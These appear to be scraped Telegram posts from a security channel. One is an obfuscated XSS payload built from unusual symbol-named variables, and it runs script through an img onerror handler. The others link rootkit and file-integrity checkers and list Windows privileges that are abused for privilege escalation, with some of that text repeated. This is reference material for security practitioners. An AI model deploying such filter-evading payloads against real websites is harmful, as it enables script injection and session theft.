Forwarded from Fly Dragon Fly
XSS payload, Cuneiform-alphabet based
"><img/src=x onerror="π='',π¨=!π+π,π=!π¨+π,π=π+{},π=π¨[π++],π΅=π¨[π=π],π=++π+π,π =π[π+π],π¨[π +=π[π]+(π¨.π+π)[π]+π[π]+π+π΅+π¨[π]+π +π+π[π]+π΅][π ](π[π]+π[π]+π¨[π]+π΅+π+'(document.domain)')()"Please open Telegram to view this post
VIEW IN TELEGRAM
https://www.chkrootkit.org/
https://github.com/Tripwire/tripwire-open-source/
https://aide.github.io/
https://sourceforge.net/projects/aide/
https://github.com/Tripwire/tripwire-open-source/
https://aide.github.io/
https://sourceforge.net/projects/aide/
www.chkrootkit.org
chkrootkit -- locally checks for signs of a rootkit
chkrootkit locally checks for signs of a rootkit. Includes ifpromisc.c to check if the interface is in promiscuous mode, chklastlog.c and chkwtmp.c to check for lastlog and wtmp deletions and chkproc.c for signs of LKM trojans.
Specific Windows privileges can be abused by attackers for privilege escalation purposes. Such privileges are:
- SeDebugPrivilege
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTakeOwnershipPrivilege
- SeRestorePrivilege
- SeBackupPrivilege
- SeLoadDriver
- SeCreateTokenPrivilege
- SeTcbPrivilege
#WinPrivEsc
- SeDebugPrivilege
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTakeOwnershipPrivilege
- SeRestorePrivilege
- SeBackupPrivilege
- SeLoadDriver
- SeCreateTokenPrivilege
- SeTcbPrivilege
#WinPrivEsc